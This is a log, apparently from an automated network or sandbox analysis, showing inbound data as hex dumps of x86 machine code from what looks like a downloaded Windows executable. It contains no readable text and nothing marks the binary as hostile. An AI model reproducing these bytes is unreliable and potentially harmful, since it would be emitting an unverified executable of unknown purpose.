2023-10-05 16:48:01 UTC	539	IN	Data Raw: 6a 04 ff 73 04 e8 f7 12 fb ff 83 c4 08 ff 73 04 68 ef 11 00 00 68 f9 02 00 00 ff 74 24 70 e8 7e f1 ff ff 83 c4 10 8b 03 57 53 ff 50 0c 83 c4 08 8b 03 53 ff 50 10 83 c4 04 6a 20 57 ff 76 04 e8 3d 12 fb ff 83 c4 0c 8b 06 57 56 ff 50 0c 83 c4 08 8b 06 56 ff 50 10 83 c4 04 8b 44 24 28 8b 54 24 08 89 42 1c 8b 44 24 24 89 42 18 8b 44 24 20 89 42 14 8b 44 24 1c 89 42 10 8b 44 24 18 89 42 0c 8b 44 24 14 89 42 08 8b 44 24 0c 8b 4c 24 10 89 4a 04 89 02 6a 40 57 e8 d4 e5 fd ff 83 c4 08 8b 4c 24 4c 31 e1 e8 96 6a 01 00 83 c4 50 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 50 89 d3 89 4c 24 08 a1 34 00 50 00 31 e0 89 44 24 4c 8b 35 68 86 4d 00 68 68 86 4d 00 ff d6 83 c4 04 89 c7 85 c0 74 09 8b 07 57 ff 50 04 83 c4 04 0f b6 c3 50 89 7c 24 Data Ascii: jsshht$p~WSPSPj Wv=WVPVPD$(T$BD$$BD$ BD$BD$BD$BD$L$Jj@WL$L1jP^_[]USWVPL$4P1D$L5hMhhMtWPP\|$
2023-10-05 16:48:01 UTC	547	IN	Data Raw: 24 08 56 ff 75 fc e8 c6 20 fe ff 83 c4 08 89 44 24 04 57 50 e8 88 18 fe ff 83 c4 08 89 c5 8b 44 24 3c ff 70 f0 55 ff 74 24 08 e8 c2 30 fe ff 83 c4 0c 89 c7 55 e8 e7 f8 fd ff 83 c4 04 ff 74 24 04 e8 db f8 fd ff 83 c4 04 ff 34 24 e8 d0 f8 fd ff 83 c4 04 ff 74 24 0c e8 c4 f8 fd ff 83 c4 04 ff 74 24 08 e8 b8 f8 fd ff 83 c4 04 68 60 f7 4d 00 ff 73 08 e8 d8 f4 fa ff 83 c4 08 6a 28 ff 73 08 e8 eb f3 fa ff 83 c4 08 bd 13 00 00 00 90 90 90 55 56 e8 39 f9 fd ff 83 c4 08 0f b6 c0 50 ff 73 08 e8 1a f3 fa ff 83 c4 08 83 c5 ff 72 e2 bd 13 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 55 57 e8 09 f9 fd ff 83 c4 08 0f b6 c0 50 ff 73 08 e8 ea f2 fa ff 83 c4 08 83 c5 ff 72 e2 56 e8 3c f8 fd ff 83 c4 04 57 e8 33 f8 fd ff 83 c4 04 8b 4c 24 24 31 e1 e8 05 4b 01 00 83 c4 28 Data Ascii: $Vu D$WPD$<pUt$0Ut$4$t$t$h`Msj(sUV9PsrUWPsrV<W3L$$1K(
2023-10-05 16:48:01 UTC	555	IN	Data Raw: 83 c4 10 56 e8 c8 dc fa ff 83 c4 04 ff 74 24 1c e8 ac e2 fa ff 83 c4 04 8b 8c 24 38 01 00 00 31 e9 e8 9b 2c 01 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 68 91 69 4e 00 6a 06 57 e8 24 d2 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 14 d2 fd ff 83 c4 0c f6 44 24 04 01 0f 85 b1 fe ff ff 68 76 69 4e 00 6a 06 57 e8 f9 d1 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 e9 d1 fd ff 83 c4 0c f6 44 24 18 01 0f 85 91 fe ff ff 68 5c 69 4e 00 6a 06 57 e8 ce d1 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 be d1 fd ff 83 c4 0c f6 44 24 14 01 0f 85 71 fe ff ff 68 43 69 4e 00 6a 06 57 e8 a3 d1 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 93 d1 fd ff 83 c4 0c f6 44 24 10 01 0f 84 4d fe ff ff e9 68 fe ff ff 6a 07 68 5d 17 4e 00 ff 74 24 0c e8 10 d3 fa ff 83 c4 0c 8b 75 08 8d 5c 24 38 e9 02 fb ff Data Ascii: Vt$$81,e^_[]hiNjW$hoNjWD$hviNjWhoNjWD$h\iNjWhoNjWD$qhCiNjWhoNjWD$Mhjh]Nt$u\$8
2023-10-05 16:48:01 UTC	563	IN	Data Raw: ba 02 00 00 00 6a 02 50 e8 a4 01 00 00 83 c4 08 8d 84 24 80 0a 00 00 8d 8c 24 80 06 00 00 ba 02 00 00 00 6a 02 50 e8 86 01 00 00 83 c4 08 8d 84 24 00 0b 00 00 8d 8c 24 00 07 00 00 ba 02 00 00 00 6a 02 50 e8 68 01 00 00 83 c4 08 8d 84 24 80 0b 00 00 8d 8c 24 80 07 00 00 ba 02 00 00 00 6a 02 50 e8 4a 01 00 00 83 c4 08 89 e3 89 d9 ba 10 00 00 00 6a 10 57 e8 36 01 00 00 83 c4 08 8d 84 24 10 04 00 00 8d 4c 24 10 ba 10 00 00 00 6a 10 50 e8 1b 01 00 00 83 c4 08 8d 84 24 20 04 00 00 8d 4c 24 20 ba 10 00 00 00 6a 10 50 e8 00 01 00 00 83 c4 08 8d 84 24 30 04 00 00 8d 4c 24 30 ba 10 00 00 00 6a 10 50 e8 e5 00 00 00 83 c4 08 8d 84 24 40 04 00 00 8d 4c 24 40 ba 10 00 00 00 6a 10 50 e8 ca 00 00 00 83 c4 08 8d 84 24 50 04 00 00 8d 4c 24 50 ba 10 00 00 00 6a 10 50 e8 af Data Ascii: jP$$jP$$jPh$$jPJjW6$L$jP$ L$ jP$0L$0jP$@L$@jP$PL$PjP
2023-10-05 16:48:01 UTC	571	IN	Data Raw: 83 c4 0c eb 56 56 ff 15 40 d9 4f 00 ff 15 f8 d9 4f 00 50 e8 c9 d9 fa ff 83 c4 04 50 68 36 12 4e 00 eb 30 57 ff 74 24 08 ff 15 80 db 4f 00 85 c0 74 0b ff 34 24 ff 15 c0 da 4f 00 eb 29 56 ff 15 40 d9 4f 00 ff 34 24 ff 15 c0 da 4f 00 55 68 bd f3 4d 00 e8 29 93 fa ff 83 c4 08 8b 4c 24 24 89 01 be ff ff ff ff 8b 4c 24 08 31 e1 e8 d0 ed 00 00 89 f0 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc 56 83 ec 08 8b 74 24 14 8b 44 24 10 8b 0d 34 00 50 00 31 e1 89 4c 24 04 c7 04 24 00 00 00 00 89 e1 51 50 e8 38 fe ff ff 83 c4 08 83 f8 ff 74 15 6a 01 56 6a 00 6a 00 6a 00 50 50 e8 50 06 00 00 83 c4 1c eb 0c ff 34 24 56 e8 f2 13 00 00 83 c4 08 89 c6 8b 4c 24 04 31 e1 e8 62 ed 00 00 89 f0 83 c4 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 8b 5c 24 24 8b 7c 24 Data Ascii: VV@OOPPh6N0Wt$Ot4$O)V@O4$OUhM)L$$L$1^_[]Vt$D$4P1L$$QP8tjVjjjPPP4$VL$1b^USWV\$$\|$
2023-10-05 16:48:01 UTC	578	IN	Data Raw: cc 68 ae 00 00 00 ff 74 24 0c e8 52 67 fa ff 83 c4 08 8b 00 80 38 00 74 0d 50 ff 74 24 08 e8 7e ab 00 00 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc 57 56 8b 7c 24 0c 6a 00 6a 28 6a 01 e8 3f 7e fa ff 83 c4 0c 89 c6 89 38 8d 78 20 c7 40 20 08 86 4d 00 c7 40 24 00 00 00 00 c6 40 1d 00 83 c0 04 50 e8 9a d5 fa ff 83 c4 04 c7 46 18 00 00 00 00 c6 46 1c 01 89 f8 5e 5f c3 cc cc cc cc cc cc cc 57 56 8b 74 24 0c 81 3e 08 86 4d 00 74 17 68 be 00 00 00 68 38 50 4f 00 68 52 19 4f 00 e8 21 c6 01 00 83 c4 0c 8b 46 f8 85 c0 74 09 50 e8 ae 6d fe ff 83 c4 04 8d 7e e0 83 c6 e4 56 e8 8f d5 fa ff 83 c4 04 57 e8 46 7e fa ff 83 c4 04 5e 5f c3 55 53 57 56 8b 6c 24 20 8b 44 24 1c 8b 7c 24 14 81 3f 08 86 4d 00 74 1b 68 ca 00 00 00 68 38 50 4f 00 68 52 19 4f 00 89 c6 e8 c5 c5 01 00 Data Ascii: ht$Rg8tPt$~WV\|$jj(j?~8x @ M@$@PFF^_WVt$>Mthh8POhRO!FtPm~VWF~^_USWVl$ D$\|$?Mthh8POhRO
2023-10-05 16:48:01 UTC	586	IN	Data Raw: c4 08 89 c6 8b 44 24 28 50 53 55 e8 d1 fb ff ff 83 c4 0c 89 44 24 0c 56 ff 33 ff 75 00 e8 0f 5e fd ff 83 c4 0c 56 ff 73 04 ff 75 04 e8 00 5e fd ff 83 c4 0c 55 e8 87 fd ff ff 83 c4 04 89 44 24 04 ff 75 00 e8 98 5c fd ff 83 c4 04 ff 75 04 e8 8d 5c fd ff 83 c4 04 6a 0c 55 e8 92 2a fd ff 83 c4 08 55 e8 69 5f fa ff 83 c4 04 ff 33 e8 6f 5c fd ff 83 c4 04 ff 73 04 e8 64 5c fd ff 83 c4 04 6a 0c 53 e8 69 2a fd ff 83 c4 08 53 e8 40 5f fa ff 83 c4 04 89 74 24 08 56 8b 6c 24 10 ff 75 00 8b 5c 24 0c ff 33 e8 86 5d fd ff 83 c4 0c 56 ff 75 04 ff 73 04 e8 77 5d fd ff 83 c4 0c 8b 03 89 de 57 8b 5c 24 2c ff 33 50 50 e8 f2 5c fd ff 83 c4 10 8b 46 04 57 ff 73 04 50 50 e8 e1 5c fd ff 83 c4 10 8b 45 00 57 8b 5c 24 04 ff 33 50 50 e8 cd 5c fd ff 83 c4 10 8b 45 04 57 ff 73 04 50 Data Ascii: D$(PSUD$V3u^Vsu^UD$u\u\jUUi_3o\sd\jSiS@_t$Vl$u\$3]Vusw]W\$,3PP\FWsPP\EW\$3PP\EWsP
2023-10-05 16:48:01 UTC	594	IN	Data Raw: 75 ef 8d 44 24 10 68 f0 00 00 00 50 e8 a0 0b fd ff 83 c4 08 85 ff 74 76 8b 4c 24 04 83 e1 fe 8b 3c 24 89 f8 c1 e0 04 8b 9c 24 18 01 00 00 8d 14 18 81 c2 5c ff ff ff f7 df 8d ab 1c fe ff ff 31 c0 eb 20 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 0f 7f 42 f0 83 c0 02 83 c2 e0 83 c5 20 39 c1 74 2d 8d 1c 07 66 0f 6f 45 f0 85 c0 74 0a 83 fb 06 74 05 66 0f 38 db c0 66 0f 7f 02 66 0f 6f 45 00 83 fb 05 74 ca 66 0f 38 db c0 eb c3 31 c0 f6 44 24 04 01 74 33 81 44 24 08 fc fe ff ff 8b 14 24 83 c2 06 29 c2 89 c1 c1 e1 04 66 0f 6f 04 0e 85 c0 74 09 85 d2 74 05 66 0f 38 db c0 c1 e2 04 8b 44 24 08 66 0f 7f 04 10 8b 8c 24 00 01 00 00 31 e1 e8 a9 8f 00 00 81 c4 04 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 0c 85 c0 0f 8e 92 00 00 00 8b 4c Data Ascii: uD$hPtvL$<$$\1 fB 9t-foEttf8ffoEtf81D$t3D$$)fottf8D$f$1^_[]D$L
2023-10-05 16:48:01 UTC	602	IN	Data Raw: 00 8d 04 a8 89 44 24 38 89 c8 25 33 f3 ff ff 89 cd c1 ed 02 81 e5 33 33 00 00 8d 04 85 00 00 00 00 01 e8 89 44 24 24 33 5c 24 10 89 dd 81 e5 33 f3 ff ff 89 df c1 ef 02 81 e7 33 33 00 00 8d 04 af 89 44 24 3c 8b 44 24 04 33 44 24 30 89 c5 89 44 24 04 81 e5 33 f3 ff ff c1 e8 02 25 33 33 00 00 8d 04 a8 89 44 24 44 8b 04 24 25 33 f3 ff ff c1 ee 02 81 e6 33 33 00 00 8d 04 86 89 04 24 8b 74 24 50 8b 44 24 0c 33 44 24 28 8b 7c 24 08 33 7c 24 20 33 7c 24 1c 89 7c 24 08 8b 6c 24 38 31 6c 24 14 33 4c 24 10 33 4c 24 3c 89 cf 33 5c 24 30 33 5c 24 44 8b 4c 24 04 33 4c 24 2c 33 0c 24 89 4c 24 04 8b 4c 24 4c 8b 6c 24 18 33 6c 24 34 33 54 24 24 66 33 06 89 44 24 0c 66 33 6e 02 8b 44 24 08 66 33 46 04 89 44 24 10 8b 44 24 14 66 33 46 06 89 44 24 14 66 33 56 08 89 54 24 1c Data Ascii: D$8%333D$$3\$333D$<D$3D$0D$3%33D$D$%333$t$PD$3D$(\|$3\|$ 3\|$\|$l$81l$3L$3L$<3\$03\$DL$3L$,3$L$L$Ll$3l$43T$$f3D$f3nD$f3FD$D$f3FD$f3VT$
2023-10-05 16:48:01 UTC	610	IN	Data Raw: f8 89 5c 24 10 89 6c 24 08 eb 27 90 90 90 90 90 90 89 f1 89 f2 50 e8 b6 d8 ff ff 83 c4 04 8b 45 00 83 c0 10 89 45 00 83 c6 10 39 de 0f 83 f3 00 00 00 39 e8 75 db 8b 47 c8 8b 4f cc 89 0c 24 89 c2 0f ca 89 57 e4 89 ca 0f ca 89 57 e0 8b 57 d0 89 d3 0f cb 89 5f dc 8b 4f d4 89 cb 66 c1 c3 08 66 89 5f da 89 cb c1 eb 10 88 5f d9 89 cb 89 4c 24 14 0f cb 83 c0 01 8b 2c 24 83 d5 00 83 d2 00 89 5f d8 0f 92 04 24 89 cb 83 d3 00 88 47 f7 88 67 f6 89 c1 c1 e9 10 88 4f f5 89 c1 c1 e9 18 88 4f f4 89 e9 88 4f f3 88 6f f2 c1 e9 10 88 4f f1 89 e9 c1 e9 18 88 4f f0 88 57 ef 88 77 ee 89 d1 c1 e9 10 88 4f ed 89 d1 c1 e9 18 88 4f ec 88 5f eb 88 7f ea 89 d9 c1 e9 10 88 4f e9 c1 eb 18 88 5f e8 8b 5c 24 10 83 c0 01 89 47 c8 83 d5 00 89 6f cc 83 d2 00 89 57 d0 0f b6 04 24 13 44 24 Data Ascii: \$l$'PEE99uGO$WWW_Off__L$,$_$GgOOOoOOWwOO_O_\$GoW$D$
2023-10-05 16:48:01 UTC	618	IN	Data Raw: 18 c7 40 04 67 e6 09 6a c7 80 c4 00 00 00 00 00 00 00 c7 80 c8 00 00 00 00 00 00 00 c7 80 cc 00 00 00 00 00 00 00 c7 80 d0 00 00 00 00 00 00 00 c7 80 d4 00 00 00 00 00 00 00 89 d0 5e 5f 5b c3 cc 56 8b 44 24 08 8b 70 14 83 fe 41 72 14 6a 78 68 94 5c 4f 00 68 9e 23 4f 00 e8 25 2a 01 00 83 c4 0c 6a 00 68 f0 00 00 00 6a 01 e8 d1 e1 f9 ff 83 c4 0c 8d 88 e4 00 00 00 c7 80 e4 00 00 00 68 8e 4d 00 89 70 40 8d 90 d8 00 00 00 c7 80 d8 00 00 00 40 b3 49 00 c7 80 dc 00 00 00 00 00 00 00 89 90 e0 00 00 00 89 90 e8 00 00 00 89 c8 5e c3 cc 57 56 8b 44 24 0c 8d b8 1c ff ff ff b9 10 00 00 00 be 98 8e 4d 00 f3 a5 b9 08 c9 bd f2 33 88 5c ff ff ff 89 88 1c ff ff ff c7 80 20 ff ff ff 67 e6 09 6a c7 40 e0 00 00 00 00 c7 40 e4 00 00 00 00 c7 40 e8 00 00 00 00 c7 40 ec 00 00 00 Data Ascii: @gj^_[VD$pArjxh\Oh#O%*jhjhMp@@I^WVD$M3\ gj@@@@
2023-10-05 16:48:01 UTC	625	IN	Data Raw: 1e 89 ca 0f a4 c2 19 31 fb 31 da 89 c7 0f a4 c8 19 31 f0 89 fe 23 74 24 0c 0b 7c 24 0c 23 7c 24 10 09 f7 89 7c 24 44 89 ce 23 74 24 08 89 cb 0b 5c 24 08 23 5c 24 14 09 f3 8b 74 24 38 03 74 24 2c 8b 7c 24 1c 13 7c 24 04 01 d3 8b 4c 24 44 11 c1 03 5c 24 2c 13 4c 24 04 89 4c 24 44 89 f0 0f a4 f8 12 89 f1 0f a4 f9 0e 31 c1 89 f8 0f a4 f0 12 89 fa 0f a4 f2 0e 31 c2 89 f0 89 74 24 38 0f a4 f8 17 89 7c 24 1c 31 d0 89 44 24 04 0f a4 f7 17 31 cf 89 7c 24 4c 8b 74 24 18 8b 54 24 28 31 d6 8b 7c 24 40 8b 4c 24 30 31 cf 23 74 24 1c 23 7c 24 38 31 d6 31 cf 8b 4c 24 48 8b 84 cc d0 00 00 00 03 04 cd d0 92 4d 00 8b 94 cc d4 00 00 00 13 14 cd d4 92 4d 00 03 44 24 20 13 54 24 24 01 f8 11 f2 03 44 24 04 89 44 24 24 13 54 24 4c 89 54 24 20 89 d8 89 d9 8b 7c 24 44 0f a4 f9 04 Data Ascii: 111#t$\|$#\|$\|$D#t$\$#\$t$8t$,\|$\|$L$D\$,L$L$D11t$8\|$1D$1\|$Lt$T$(1\|$@L$01#t$#\|$811L$HMMD$ T$$D$D$$T$LT$ \|$D
2023-10-05 16:48:01 UTC	633	IN	Data Raw: 0c 39 50 00 eb 06 8b 3d 0c 39 50 00 8b 4d e4 6a 07 58 89 4d fc 39 45 f4 7c 30 33 c9 53 0f a2 8b f3 5b 90 8d 5d dc 89 03 89 73 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf 02 89 3d 0c 39 50 00 eb 03 8b 5d f0 a1 40 01 50 00 83 c8 02 c7 05 08 39 50 00 01 00 00 00 a3 40 01 50 00 f7 c1 00 00 10 00 0f 84 93 00 00 00 83 c8 04 c7 05 08 39 50 00 02 00 00 00 a3 40 01 50 00 f7 c1 00 00 00 08 74 79 f7 c1 00 00 00 10 74 71 33 c9 0f 01 d0 89 45 ec 89 55 f0 8b 45 ec 8b 4d f0 6a 06 5e 23 c6 3b c6 75 57 a1 40 01 50 00 83 c8 08 c7 05 08 39 50 00 03 00 00 00 a3 40 01 50 00 f6 c3 20 74 3b 83 c8 20 c7 05 08 39 50 00 05 00 00 00 a3 40 01 50 00 b8 00 00 03 d0 23 d8 3b d8 75 1e 8b 45 ec ba e0 00 00 00 8b 4d f0 23 c2 3b c2 75 0d 83 0d 40 01 50 00 40 89 35 Data Ascii: 9P=9PMjXM9E\|03S[]sKMS]t=9P]@P9P@P9P@Ptytq3EUEMj^#;uW@P9P@P t; 9P@P#;uEM#;u@P@5
2023-10-05 16:48:01 UTC	641	IN	Data Raw: 00 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 f7 c7 0f 00 00 00 74 0f 49 4e 4f 8a 06 88 07 f7 c7 0f 00 00 00 75 f1 81 f9 80 00 00 00 72 68 81 ee 80 00 00 00 81 ef 80 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 6f 56 20 f3 0f 6f 5e 30 f3 0f 6f 66 40 f3 0f 6f 6e 50 f3 0f 6f 76 60 f3 0f 6f 7e 70 f3 0f 7f 07 f3 0f 7f 4f 10 f3 0f 7f 57 20 f3 0f 7f 5f 30 f3 0f 7f 67 40 f3 0f 7f 6f 50 f3 0f 7f 77 60 f3 0f 7f 7f 70 81 e9 80 00 00 00 f7 c1 80 ff ff ff 75 90 83 f9 20 72 23 83 ee 20 83 ef 20 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 83 e9 20 f7 c1 e0 ff ff ff 75 dd f7 c1 fc ff ff ff 74 15 83 ef Data Ascii: D$^_FGD$^_IFGFGD$^_FGFGFGD$^_tINOurhooNoV o^0of@onPov`o~pOW _0g@oPw`pu r# ooNO ut
2023-10-05 16:48:01 UTC	649	IN	Data Raw: c0 eb 44 ff 76 28 e8 ad ef ff ff 59 83 e8 01 74 2b 83 e8 01 74 1d 48 83 e8 01 74 10 83 e8 04 75 be 8b 46 14 99 89 07 89 57 04 eb 15 8b 46 14 89 07 eb 0e 66 8b 46 14 66 89 07 eb 05 8a 46 14 88 07 c6 46 2c 01 b0 01 5f 5e c3 8b ff 55 8b ec 8b 4d 08 8d 41 e0 66 83 f8 5a 77 0f 8d 41 e0 83 e0 7f 8a 04 45 69 96 4d 00 eb 02 32 c0 0f b6 c8 0f b6 45 0c 8d 04 c8 83 e0 7f 8a 04 45 68 96 4d 00 5d c2 08 00 8b ff 55 8b ec 81 ec 64 04 00 00 a1 34 00 50 00 33 c5 89 45 fc 53 56 8b f1 57 8b 06 8b 7e 04 8b 18 53 e8 12 21 01 00 88 85 9c fb ff ff 8b 06 59 8d 8d a4 fb ff ff 8b 00 89 85 a0 fb ff ff 8b 46 10 ff 30 8b 46 0c ff 76 04 ff 30 8b 46 08 ff 70 04 ff 30 8d 85 a0 fb ff ff 50 e8 20 f2 ff ff 83 65 f4 00 8d 8d a4 fb ff ff e8 bb f3 ff ff 8d 8d e0 fb ff ff 8b f0 e8 e3 ed ff ff Data Ascii: Dv(Yt+tHtuFWFfFfFF,_^UMAfZwAEiM2EEhM]Ud4P3ESVW~S!YF0Fv0Fp0P e
2023-10-05 16:48:01 UTC	657	IN	Data Raw: 01 8b 46 10 74 06 0f bf 40 fc eb 04 0f b7 40 fc 99 89 55 fc eb 1e 8b 4e 1c 8b c1 83 46 10 04 c1 e8 04 a8 01 8b 46 10 74 06 0f be 40 fc eb 04 0f b6 40 fc 99 8b f8 8b c1 c1 e8 04 a8 01 74 16 3b d3 7f 12 7c 04 3b fb 73 0c f7 df 13 d3 f7 da 83 c9 40 89 4e 1c 83 7e 24 00 89 55 fc 7d 09 c7 46 24 01 00 00 00 eb 17 ff 76 08 83 e1 f7 ff 76 24 89 4e 1c 8d 4e 3c e8 23 f6 ff ff 8b 55 fc 8b c7 0b c2 75 04 83 66 1c df 83 7d f8 08 8b ce ff 75 08 88 5e 38 75 09 52 57 e8 56 10 00 00 eb 06 57 e8 ea 10 00 00 8b 46 1c c1 e8 07 a8 01 74 19 39 5e 34 74 08 8b 46 30 80 38 30 74 0c ff 4e 30 8b 4e 30 c6 01 30 ff 46 34 b0 01 5f 5e 5b c9 c2 04 00 8b ff 55 8b ec 51 51 53 56 8b f1 57 ff 76 28 e8 93 cf ff ff 59 8b c8 89 45 f8 6a 00 5f 83 e9 01 0f 84 9c 00 00 00 83 e9 01 74 74 49 83 e9 Data Ascii: Ft@@UNFFt@@t;\|;s@N~$U}F$vv$NN<#Uuf}u^8uRWVWFt9^4tF080tN0N00F4_^[UQQSVWv(YEj_ttI
2023-10-05 16:48:01 UTC	664	IN	Data Raw: c0 fe c8 22 d8 88 5d f4 83 ee 01 75 eb 8b 4d fc ff 75 18 8b 55 f8 ff 75 f4 ff 75 10 ff 75 e0 52 51 e8 b1 fa ff ff 83 c4 18 5f 5e 5b c9 c3 8b ff 55 8b ec 81 ec 2c 0b 00 00 a1 34 00 50 00 33 c5 89 45 fc 8b 4d 0c 33 c0 8b 55 08 53 56 38 41 04 8b 1a 0f 94 c0 89 95 b4 f6 ff ff 48 89 8d ac f6 ff ff 83 e0 1d 83 c0 19 89 85 b0 f6 ff ff 57 85 db 79 02 33 db 8b 42 04 8b cb 3b d8 72 02 8b c8 2b d9 8d 7a 08 83 c0 08 89 9d c4 f6 ff ff 03 c2 89 bd c0 f6 ff ff 8d 5a 08 89 85 a8 f6 ff ff 03 d9 33 f6 2b c3 89 9d a4 f6 ff ff 89 85 e4 f6 ff ff 33 c9 33 c0 89 b5 e0 f6 ff ff 89 85 e8 f6 ff ff 89 85 2c fe ff ff 3b fb 0f 85 03 01 00 00 8b d8 8b 85 c4 f6 ff ff 85 c0 0f 84 7d 0a 00 00 6a 0a 33 d2 59 f7 f1 89 85 e0 f6 ff ff 8b ca 89 8d d8 f6 ff ff 85 c0 0f 84 17 0a 00 00 83 f8 26 Data Ascii: "]uMuUuuuRQ_^[U,4P3EM3USV8AHWy3B;r+zZ3+33,;}j3Y&
2023-10-05 16:48:01 UTC	672	IN	Data Raw: c0 89 56 0c f3 ab 5f 89 56 10 8b c6 66 89 56 14 88 56 16 89 56 18 89 56 1c 89 56 20 88 56 24 89 56 28 5e 5d c2 0c 00 83 79 08 00 75 13 e8 6a 40 00 00 c7 00 16 00 00 00 e8 6d bc 00 00 32 c0 c3 b0 01 c3 8b ff 53 56 8b f1 33 db 39 5e 0c 75 29 8b 46 08 89 5e 10 66 89 5e 14 88 5e 16 89 5e 18 89 5e 1c 89 5e 20 88 5e 24 89 5e 28 8a 00 84 c0 75 0c c7 46 10 01 00 00 00 32 c0 5e 5b c3 0f b6 c0 50 e8 8a 7a 00 00 59 8b 4e 08 85 c0 74 24 c7 46 10 02 00 00 00 0f b6 01 eb 09 ff 46 08 8b 46 08 0f b6 00 50 e8 67 7a 00 00 59 85 c0 75 ec b0 01 eb c8 80 39 25 75 7c 8d 41 01 80 38 25 74 74 c7 46 10 04 00 00 00 89 46 08 80 38 2a 75 08 40 c6 46 16 01 89 46 08 8b ce e8 10 01 00 00 84 c0 74 97 8b ce e8 99 01 00 00 8b ce e8 a5 02 00 00 8b ce e8 dd 02 00 00 84 c0 0f 84 7a ff ff ff Data Ascii: V_VfVVVVV V$V(^]yuj@m2SV39^u)F^f^^^^^ ^$^(uF2^[PzYNt$FFFPgzYu9%u\|A8%ttFF8*u@FFtz
2023-10-05 16:48:01 UTC	680	IN	Data Raw: 08 e8 70 01 00 00 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 60 01 00 00 83 c4 0c c3 6a 01 6a 02 6a 00 e8 51 01 00 00 83 c4 0c c3 8b ff 55 8b ec a1 24 39 50 00 3b 05 34 00 50 00 0f 85 a6 72 00 00 ff 75 08 e8 52 6d ff ff 59 a3 24 39 50 00 5d c3 8b ff 55 8b ec 8b 45 08 a3 24 39 50 00 5d c3 6a 00 ff 15 14 da 4f 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0 01 c3 32 c0 c3 8b ff 55 8b ec 6a ff 68 94 67 4c 00 64 a1 00 00 00 00 50 51 56 a1 34 00 50 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 83 65 f0 00 8d 45 f0 50 68 ec b4 4f 00 6a 00 ff 15 10 da 4f 00 85 c0 74 21 68 80 99 4f 00 ff 75 f0 ff 15 20 da 4f 00 8b f0 85 f6 74 0d ff 75 08 8b ce ff 15 00 50 50 00 Data Ascii: p]jjj`jjjQU$9P;4PruRmY$9P]UE$9P]jOt4MZf9u*H<9PEuf9Auytvt2UjhgLdPQV4P3PEdeEPhOjOt!hOu OtuPP
2023-10-05 16:48:01 UTC	688	IN	Data Raw: 8b 40 04 ff 30 e8 4f 4e ff ff 53 89 07 e8 47 4e ff ff 8b 5d f8 8b 0b 8b 09 89 01 8d 47 04 50 e8 35 4e ff ff 8b 0b 56 8b 09 89 41 04 e8 28 4e ff ff 8b 0b 83 c4 10 8b 09 89 41 08 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 53 8b d9 57 89 5d ec 8b 03 8b 38 85 ff 75 08 83 c8 ff e9 b7 00 00 00 8b 15 34 00 50 00 8b ca 56 8b 37 83 e1 1f 8b 7f 04 33 f2 33 fa d3 ce d3 cf 85 f6 0f 84 93 00 00 00 83 fe ff 0f 84 8a 00 00 00 89 55 fc 89 7d f4 89 75 f8 83 ef 04 3b fe 72 54 8b 07 3b 45 fc 74 f2 33 c2 8b 55 fc d3 c8 8b c8 89 17 89 45 f0 ff 15 00 50 50 00 ff 55 f0 8b 03 8b 15 34 00 50 00 8b ca 83 e1 1f 8b 00 8b 18 8b 40 04 33 da d3 cb 33 c2 d3 c8 3b 5d f8 89 5d f0 8b 5d ec 75 05 3b 45 f4 74 af 8b 75 f0 8b f8 89 45 f4 eb a2 83 fe ff 74 0d 56 e8 58 7c 00 00 Data Ascii: @0ONSGN]GP5NVA(NA3_^[USW]8u4PV733U}u;rT;Et3UEPPU4P@33;]]]u;EtuEtVX\|
2023-10-05 16:48:01 UTC	696	IN	Data Raw: 3c 80 fa 29 74 35 84 d2 74 91 8a c2 2c 30 3c 09 76 19 8a c2 2c 61 3c 19 76 11 8a c2 2c 41 3c 19 76 09 80 fa 5f 0f 85 70 ff ff ff 8b 06 8a 08 40 89 06 8a d1 88 0f 80 f9 29 75 cb 6a 04 58 5f 5e c9 c3 8b ff 55 8b ec 53 56 8b 75 08 33 d2 57 8b 7d 0c 8b ca 8a 1e 3a 99 cc a4 4d 00 74 08 3a 99 d4 a4 4d 00 75 11 8b 07 8a 18 40 41 89 07 88 1e 83 f9 05 75 e1 b2 01 5f 5e 8a c2 5b 5d c3 8b ff 55 8b ec 53 56 8b 75 08 33 d2 57 8b 7d 0c 8b ca 8a 1e 3a 99 dc a4 4d 00 74 08 3a 99 e0 a4 4d 00 75 11 8b 07 8a 18 40 41 89 07 88 1e 83 f9 04 75 e1 b2 01 5f 5e 8a c2 5b 5d c3 8b ff 55 8b ec 83 ec 2c 8d 4d d4 56 6a 00 e8 c4 30 ff ff 8b 45 08 6a 01 6a 0a 51 51 8b cc 83 61 04 00 89 01 8d 45 d4 50 e8 60 05 00 00 83 c4 14 8d 4d d4 8b f0 e8 fd 30 ff ff 8b c6 5e c9 c3 8b ff 55 8b ec 83 Data Ascii: 